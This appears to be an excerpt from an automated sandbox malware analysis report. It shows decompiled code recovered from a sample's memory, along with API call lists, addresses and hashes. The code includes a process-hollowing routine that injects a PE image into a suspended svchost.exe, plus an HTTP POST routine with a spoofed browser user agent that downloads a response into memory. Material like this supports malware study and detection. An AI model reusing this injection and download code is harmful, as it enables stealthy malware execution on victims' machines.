                                                                                                                                                                                                                                                    				_v12 = _t128;
                                                                                                                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                                                                                                                    					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                    					if(_t130 != 0) {
                                                                                                                                                                                                                                                    						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                    						_v1100 = _t132;
                                                                                                                                                                                                                                                    						if(_v1100 != 0) {
                                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                                    							E00EC7B70(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                    							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                    							_v1104 = 0;
                                                                                                                                                                                                                                                    							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                    								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    									E00EC7B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                    									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									E00EC7B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                    									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							E00EC26D0(_v12, _v1100);
                                                                                                                                                                                                                                                    							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                    							if(_t140 != 0) {
                                                                                                                                                                                                                                                    								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                    								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                    								if(_t143 != 0) {
                                                                                                                                                                                                                                                    									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                    									if(_t145 != 0) {
                                                                                                                                                                                                                                                    										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                    										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                    										if(_t148 == 0) {
                                                                                                                                                                                                                                                    											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                    											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                    											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                    											goto L26;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                    										return _v1012.hProcess;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                    									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                    									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                    									return 0;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                    								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                    								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                    							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                    							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                    							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                    							return 0;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v1100 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40);
                                                                                                                                                                                                                                                    						if(_v1100 != 0) {
                                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                    						CloseHandle(_v1012);
                                                                                                                                                                                                                                                    						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                    						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}
























                                                                                                                                                                                                                                                    0x00ec20bd
                                                                                                                                                                                                                                                    0x00ec2502
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2502
                                                                                                                                                                                                                                                    0x00ec20d4
                                                                                                                                                                                                                                                    0x00ec20e6
                                                                                                                                                                                                                                                    0x00ec20f0
                                                                                                                                                                                                                                                    0x00ec20fe
                                                                                                                                                                                                                                                    0x00ec210f
                                                                                                                                                                                                                                                    0x00ec210f
                                                                                                                                                                                                                                                    0x00ec2120
                                                                                                                                                                                                                                                    0x00ec2133
                                                                                                                                                                                                                                                    0x00ec2138
                                                                                                                                                                                                                                                    0x00ec213b
                                                                                                                                                                                                                                                    0x00ec214e
                                                                                                                                                                                                                                                    0x00ec2168
                                                                                                                                                                                                                                                    0x00ec2177
                                                                                                                                                                                                                                                    0x00ec2187
                                                                                                                                                                                                                                                    0x00ec218d
                                                                                                                                                                                                                                                    0x00ec2194
                                                                                                                                                                                                                                                    0x00ec21c0
                                                                                                                                                                                                                                                    0x00ec21c8
                                                                                                                                                                                                                                                    0x00ec21fe
                                                                                                                                                                                                                                                    0x00ec2204
                                                                                                                                                                                                                                                    0x00ec2211
                                                                                                                                                                                                                                                    0x00ec227d
                                                                                                                                                                                                                                                    0x00ec228f
                                                                                                                                                                                                                                                    0x00ec2294
                                                                                                                                                                                                                                                    0x00ec2297
                                                                                                                                                                                                                                                    0x00ec22b2
                                                                                                                                                                                                                                                    0x00ec22ce
                                                                                                                                                                                                                                                    0x00ec235e
                                                                                                                                                                                                                                                    0x00ec2363
                                                                                                                                                                                                                                                    0x00ec22d0
                                                                                                                                                                                                                                                    0x00ec2312
                                                                                                                                                                                                                                                    0x00ec2317
                                                                                                                                                                                                                                                    0x00ec2317
                                                                                                                                                                                                                                                    0x00ec22ac
                                                                                                                                                                                                                                                    0x00ec22ac
                                                                                                                                                                                                                                                    0x00ec2376
                                                                                                                                                                                                                                                    0x00ec2396
                                                                                                                                                                                                                                                    0x00ec239e
                                                                                                                                                                                                                                                    0x00ec23ec
                                                                                                                                                                                                                                                    0x00ec23f2
                                                                                                                                                                                                                                                    0x00ec240a
                                                                                                                                                                                                                                                    0x00ec2412
                                                                                                                                                                                                                                                    0x00ec2460
                                                                                                                                                                                                                                                    0x00ec2468
                                                                                                                                                                                                                                                    0x00ec24a6
                                                                                                                                                                                                                                                    0x00ec24ba
                                                                                                                                                                                                                                                    0x00ec24c2
                                                                                                                                                                                                                                                    0x00ec24e2
                                                                                                                                                                                                                                                    0x00ec24ef
                                                                                                                                                                                                                                                    0x00ec24fc
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec24fc
                                                                                                                                                                                                                                                    0x00ec24cb
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec24d1
                                                                                                                                                                                                                                                    0x00ec2473
                                                                                                                                                                                                                                                    0x00ec2480
                                                                                                                                                                                                                                                    0x00ec248d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2493
                                                                                                                                                                                                                                                    0x00ec241d
                                                                                                                                                                                                                                                    0x00ec242a
                                                                                                                                                                                                                                                    0x00ec2437
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec243d
                                                                                                                                                                                                                                                    0x00ec23a9
                                                                                                                                                                                                                                                    0x00ec23b6
                                                                                                                                                                                                                                                    0x00ec23c3
                                                                                                                                                                                                                                                    0x00ec23d4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec23da
                                                                                                                                                                                                                                                    0x00ec222d
                                                                                                                                                                                                                                                    0x00ec223a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2245
                                                                                                                                                                                                                                                    0x00ec2252
                                                                                                                                                                                                                                                    0x00ec225f
                                                                                                                                                                                                                                                    0x00ec2270
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2276
                                                                                                                                                                                                                                                    0x00ec21d5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2196
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec2196

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 00EC20D4
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 00EC20E6
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00ECC38C), ref: 00EC20FE
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00EC210F
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00EC2187
                                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00EC21C0
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EC21D5
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(?,00EC2080,?,00003000,00000040), ref: 00EC21FE
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 00EC2227
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00EC2245
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EC2252
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EC225F
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EC2270
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                    • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                    • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                    • Opcode ID: 5e1abecdf1a1ae650bd13049a66ffc7048dea76abf2c13ea9d55bb003eb70d69
                                                                                                                                                                                                                                                    • Instruction ID: 19b609ff39ecec8638e18eeb1e2442cbcde0762405d812b497cfe5b69198f62a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e1abecdf1a1ae650bd13049a66ffc7048dea76abf2c13ea9d55bb003eb70d69
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88D14CB1A00219EFCB28CF54CC95FAE77B9BB48304F14859CF609BB281D6719A86CF55
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 450 ec1840-ec1854 451 ec185a-ec185e 450->451 452 ec1c95-ec1c9b 450->452 451->452 453 ec1864-ec1868 451->453 453->452 454 ec186e-ec1872 453->454 454->452 455 ec1878-ec190a call ec7d20 InternetCrackUrlA 454->455 455->452 458 ec1910-ec1930 InternetOpenA 455->458 458->452 459 ec1936-ec1969 InternetConnectA 458->459 460 ec196f-ec19a7 HttpOpenRequestA 459->460 461 ec1c88-ec1c8f InternetCloseHandle 459->461 462 ec19ad-ec19e5 wnsprintfA HttpAddRequestHeadersA 460->462 463 ec1c7b-ec1c82 InternetCloseHandle 460->463 461->452 464 ec1c6e-ec1c75 InternetCloseHandle 462->464 465 ec19eb-ec19f9 462->465 463->461 464->463 466 ec19fb-ec19fe 465->466 467 ec1a04-ec1a26 InternetSetOptionA 465->467 466->467 468 ec1a30-ec1a75 call ec7d20 HttpSendRequestA 467->468 471 ec1c4c-ec1c5f 468->471 472 ec1a7b-ec1aa1 HttpQueryInfoA 468->472 471->464 475 ec1c61-ec1c68 471->475 473 ec1ac9-ec1b0f call ec7d20 HttpQueryInfoA 472->473 474 ec1aa3-ec1abc call ec7dd0 472->474 481 ec1b47-ec1b6a VirtualAlloc 473->481 482 ec1b11-ec1b2d call ec7dd0 473->482 474->473 480 ec1abe-ec1ac7 474->480 475->464 475->468 480->473 483 ec1c19 481->483 484 ec1b70-ec1b93 481->484 482->481 489 ec1b2f-ec1b39 482->489 487 ec1c23-ec1c4a InternetReadFile 483->487 486 ec1b99-ec1bc9 InternetReadFile 484->486 490 ec1bdb-ec1be2 486->490 491 ec1bcb-ec1bd9 486->491 487->471 487->487 489->481 492 ec1b3b-ec1b41 489->492 493 ec1be4 490->493 494 ec1be6-ec1c11 490->494 491->490 492->481 495 ec1c17 493->495 496 ec1c15 494->496 497 ec1c13 494->497 495->471 496->486 497->495
                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC1840(char* _a4, void* _a8, long _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr* _a32) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                                                                    				char _v1300;
                                                                                                                                                                                                                                                    				char _v1564;
                                                                                                                                                                                                                                                    				void* _v1568;
                                                                                                                                                                                                                                                    				void* _v1572;
                                                                                                                                                                                                                                                    				char* _v1576;
                                                                                                                                                                                                                                                    				intOrPtr _v1588;
                                                                                                                                                                                                                                                    				char* _v1592;
                                                                                                                                                                                                                                                    				signed short _v1612;
                                                                                                                                                                                                                                                    				intOrPtr _v1616;
                                                                                                                                                                                                                                                    				char* _v1620;
                                                                                                                                                                                                                                                    				void* _v1636;
                                                                                                                                                                                                                                                    				void* _v1640;
                                                                                                                                                                                                                                                    				void* _v1644;
                                                                                                                                                                                                                                                    				void* _v1648;
                                                                                                                                                                                                                                                    				long _v1652;
                                                                                                                                                                                                                                                    				void _v1656;
                                                                                                                                                                                                                                                    				void _v1916;
                                                                                                                                                                                                                                                    				long _v1920;
                                                                                                                                                                                                                                                    				long _v1924;
                                                                                                                                                                                                                                                    				long _v1928;
                                                                                                                                                                                                                                                    				void* _v1932;
                                                                                                                                                                                                                                                    				intOrPtr _v1936;
                                                                                                                                                                                                                                                    				long _v1940;
                                                                                                                                                                                                                                                    				long _v1944;
                                                                                                                                                                                                                                                    				long _v1948;
                                                                                                                                                                                                                                                    				void _v2972;
                                                                                                                                                                                                                                                    				long _v2976;
                                                                                                                                                                                                                                                    				int _t116;
                                                                                                                                                                                                                                                    				void* _t117;
                                                                                                                                                                                                                                                    				void* _t119;
                                                                                                                                                                                                                                                    				void* _t123;
                                                                                                                                                                                                                                                    				int _t133;
                                                                                                                                                                                                                                                    				void* _t143;
                                                                                                                                                                                                                                                    				long _t151;
                                                                                                                                                                                                                                                    				void* _t194;
                                                                                                                                                                                                                                                    				void* _t195;
                                                                                                                                                                                                                                                    				void* _t196;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                    					L37:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v1644 = 0;
                                                                                                                                                                                                                                                    					_v1640 = 0;
                                                                                                                                                                                                                                                    					_v1568 = 0;
                                                                                                                                                                                                                                                    					_v1576 = "*/*";
                                                                                                                                                                                                                                                    					_v1572 = 0;
                                                                                                                                                                                                                                                    					E00EC7D20( &_v1636,  &_v1636, 0, 0x3c);
                                                                                                                                                                                                                                                    					_t195 = _t194 + 0xc;
                                                                                                                                                                                                                                                    					_v1636 = 0x3c;
                                                                                                                                                                                                                                                    					_v1620 =  &_v1564;
                                                                                                                                                                                                                                                    					_v1616 = 0x104;
                                                                                                                                                                                                                                                    					_v1592 =  &_v276;
                                                                                                                                                                                                                                                    					_v1588 = 0x104;
                                                                                                                                                                                                                                                    					_t116 = InternetCrackUrlA(_a4, 0, 0,  &_v1636); // executed
                                                                                                                                                                                                                                                    					if(_t116 == 0) {
                                                                                                                                                                                                                                                    						goto L37;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t117 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1, 0, 0, 0); // executed
                                                                                                                                                                                                                                                    					_v1644 = _t117;
                                                                                                                                                                                                                                                    					if(_v1644 == 0) {
                                                                                                                                                                                                                                                    						goto L37;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t119 = InternetConnectA(_v1644, _v1620, _v1612 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                    					_v1640 = _t119;
                                                                                                                                                                                                                                                    					if(_v1640 == 0) {
                                                                                                                                                                                                                                                    						L36:
                                                                                                                                                                                                                                                    						InternetCloseHandle(_v1644); // executed
                                                                                                                                                                                                                                                    						goto L37;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t123 = HttpOpenRequestA(_v1640, "POST", _v1592, 0, 0,  &_v1576, 0x200300, 0); // executed
                                                                                                                                                                                                                                                    					_v1568 = _t123;
                                                                                                                                                                                                                                                    					if(_v1568 == 0) {
                                                                                                                                                                                                                                                    						L35:
                                                                                                                                                                                                                                                    						InternetCloseHandle(_v1640); // executed
                                                                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					wnsprintfA( &_v1300, 0x400, "Accept-Language: en-us\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n", _a12);
                                                                                                                                                                                                                                                    					_t196 = _t195 + 0x10;
                                                                                                                                                                                                                                                    					if(HttpAddRequestHeadersA(_v1568,  &_v1300, 0xffffffff, 0) == 0) {
                                                                                                                                                                                                                                                    						L34:
                                                                                                                                                                                                                                                    						InternetCloseHandle(_v1568); // executed
                                                                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v1656 = 0x7530;
                                                                                                                                                                                                                                                    					if(_a28 > 0) {
                                                                                                                                                                                                                                                    						_v1656 = _a28;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					InternetSetOptionA(_v1568, 6,  &_v1656, 4);
                                                                                                                                                                                                                                                    					_v1652 = 1;
                                                                                                                                                                                                                                                    					_v1648 = 0;
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						_v1920 = 0x100;
                                                                                                                                                                                                                                                    						E00EC7D20( &_v1916,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                    						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                    						_v1924 = 0;
                                                                                                                                                                                                                                                    						_t133 = HttpSendRequestA(_v1568, 0, 0, _a8, _a12); // executed
                                                                                                                                                                                                                                                    						if(_t133 == 0) {
                                                                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if(HttpQueryInfoA(_v1568, 0x13,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                    							_t137 = E00EC7DD0( &_v1916);
                                                                                                                                                                                                                                                    							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                    							_v1936 = _t137;
                                                                                                                                                                                                                                                    							if(_a32 != 0) {
                                                                                                                                                                                                                                                    								_t137 = _a32;
                                                                                                                                                                                                                                                    								 *_a32 = _v1936;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						E00EC7D20(_t137,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                    						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                    						_v1928 = 0x500000;
                                                                                                                                                                                                                                                    						if(HttpQueryInfoA(_v1568, 5,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                    							_t151 = E00EC7DD0( &_v1916);
                                                                                                                                                                                                                                                    							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                    							_v1940 = _t151;
                                                                                                                                                                                                                                                    							if(_v1940 > 0 && _v1940 < 0x40000000) {
                                                                                                                                                                                                                                                    								_v1928 = _v1940;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t143 = VirtualAlloc(0, _v1928, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    						_v1932 = _t143;
                                                                                                                                                                                                                                                    						if(_v1932 == 0) {
                                                                                                                                                                                                                                                    							_v2976 = 0;
                                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                                    								InternetReadFile(_v1568,  &_v2972, 0x400,  &_v2976);
                                                                                                                                                                                                                                                    							} while (_v2976 > 0);
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							 *_a16 = _v1932;
                                                                                                                                                                                                                                                    							 *_a20 = _v1928;
                                                                                                                                                                                                                                                    							_v8 = 1;
                                                                                                                                                                                                                                                    							_v1944 = _v1928;
                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                    								_v1948 = 0;
                                                                                                                                                                                                                                                    								InternetReadFile(_v1568, _v1932, _v1944,  &_v1948); // executed
                                                                                                                                                                                                                                                    								if(_a24 != 0) {
                                                                                                                                                                                                                                                    									 *_a24 =  *_a24 + _v1948;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if(_v1948 == 0) {
                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v1932 = _v1932 + _v1948;
                                                                                                                                                                                                                                                    								_v1944 = _v1944 - _v1948;
                                                                                                                                                                                                                                                    								if(_v1944 > 0) {
                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								L29:
                                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							goto L29;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						L32:
                                                                                                                                                                                                                                                    						_v1648 = _v1648 + 1;
                                                                                                                                                                                                                                                    					} while (_v8 == 0 && _v1648 < 1);
                                                                                                                                                                                                                                                    					goto L34;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}










































                                                                                                                                                                                                                                                    0x00ec1849
                                                                                                                                                                                                                                                    0x00ec1854
                                                                                                                                                                                                                                                    0x00ec1c95
                                                                                                                                                                                                                                                    0x00ec1c9b
                                                                                                                                                                                                                                                    0x00ec1878
                                                                                                                                                                                                                                                    0x00ec1878
                                                                                                                                                                                                                                                    0x00ec1882
                                                                                                                                                                                                                                                    0x00ec188c
                                                                                                                                                                                                                                                    0x00ec1896
                                                                                                                                                                                                                                                    0x00ec18a0
                                                                                                                                                                                                                                                    0x00ec18b5
                                                                                                                                                                                                                                                    0x00ec18ba
                                                                                                                                                                                                                                                    0x00ec18bd
                                                                                                                                                                                                                                                    0x00ec18cd
                                                                                                                                                                                                                                                    0x00ec18d3
                                                                                                                                                                                                                                                    0x00ec18e3
                                                                                                                                                                                                                                                    0x00ec18e9
                                                                                                                                                                                                                                                    0x00ec1902
                                                                                                                                                                                                                                                    0x00ec190a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec191d
                                                                                                                                                                                                                                                    0x00ec1923
                                                                                                                                                                                                                                                    0x00ec1930
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1956
                                                                                                                                                                                                                                                    0x00ec195c
                                                                                                                                                                                                                                                    0x00ec1969
                                                                                                                                                                                                                                                    0x00ec1c88
                                                                                                                                                                                                                                                    0x00ec1c8f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1c8f
                                                                                                                                                                                                                                                    0x00ec1994
                                                                                                                                                                                                                                                    0x00ec199a
                                                                                                                                                                                                                                                    0x00ec19a7
                                                                                                                                                                                                                                                    0x00ec1c7b
                                                                                                                                                                                                                                                    0x00ec1c82
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1c82
                                                                                                                                                                                                                                                    0x00ec19c2
                                                                                                                                                                                                                                                    0x00ec19c8
                                                                                                                                                                                                                                                    0x00ec19e5
                                                                                                                                                                                                                                                    0x00ec1c6e
                                                                                                                                                                                                                                                    0x00ec1c75
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1c75
                                                                                                                                                                                                                                                    0x00ec19eb
                                                                                                                                                                                                                                                    0x00ec19f9
                                                                                                                                                                                                                                                    0x00ec19fe
                                                                                                                                                                                                                                                    0x00ec19fe
                                                                                                                                                                                                                                                    0x00ec1a16
                                                                                                                                                                                                                                                    0x00ec1a1c
                                                                                                                                                                                                                                                    0x00ec1a26
                                                                                                                                                                                                                                                    0x00ec1a30
                                                                                                                                                                                                                                                    0x00ec1a30
                                                                                                                                                                                                                                                    0x00ec1a48
                                                                                                                                                                                                                                                    0x00ec1a4d
                                                                                                                                                                                                                                                    0x00ec1a50
                                                                                                                                                                                                                                                    0x00ec1a6d
                                                                                                                                                                                                                                                    0x00ec1a75
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1aa1
                                                                                                                                                                                                                                                    0x00ec1aaa
                                                                                                                                                                                                                                                    0x00ec1aaf
                                                                                                                                                                                                                                                    0x00ec1ab2
                                                                                                                                                                                                                                                    0x00ec1abc
                                                                                                                                                                                                                                                    0x00ec1abe
                                                                                                                                                                                                                                                    0x00ec1ac7
                                                                                                                                                                                                                                                    0x00ec1ac7
                                                                                                                                                                                                                                                    0x00ec1abc
                                                                                                                                                                                                                                                    0x00ec1ad7
                                                                                                                                                                                                                                                    0x00ec1adc
                                                                                                                                                                                                                                                    0x00ec1adf
                                                                                                                                                                                                                                                    0x00ec1b0f
                                                                                                                                                                                                                                                    0x00ec1b18
                                                                                                                                                                                                                                                    0x00ec1b1d
                                                                                                                                                                                                                                                    0x00ec1b20
                                                                                                                                                                                                                                                    0x00ec1b2d
                                                                                                                                                                                                                                                    0x00ec1b41
                                                                                                                                                                                                                                                    0x00ec1b41
                                                                                                                                                                                                                                                    0x00ec1b2d
                                                                                                                                                                                                                                                    0x00ec1b57
                                                                                                                                                                                                                                                    0x00ec1b5d
                                                                                                                                                                                                                                                    0x00ec1b6a
                                                                                                                                                                                                                                                    0x00ec1c19
                                                                                                                                                                                                                                                    0x00ec1c23
                                                                                                                                                                                                                                                    0x00ec1c3d
                                                                                                                                                                                                                                                    0x00ec1c43
                                                                                                                                                                                                                                                    0x00ec1b70
                                                                                                                                                                                                                                                    0x00ec1b79
                                                                                                                                                                                                                                                    0x00ec1b84
                                                                                                                                                                                                                                                    0x00ec1b86
                                                                                                                                                                                                                                                    0x00ec1b93
                                                                                                                                                                                                                                                    0x00ec1b99
                                                                                                                                                                                                                                                    0x00ec1b99
                                                                                                                                                                                                                                                    0x00ec1bbf
                                                                                                                                                                                                                                                    0x00ec1bc9
                                                                                                                                                                                                                                                    0x00ec1bd9
                                                                                                                                                                                                                                                    0x00ec1bd9
                                                                                                                                                                                                                                                    0x00ec1be2
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1bf2
                                                                                                                                                                                                                                                    0x00ec1c04
                                                                                                                                                                                                                                                    0x00ec1c11
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1c15
                                                                                                                                                                                                                                                    0x00ec1c17
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1c17
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1be4
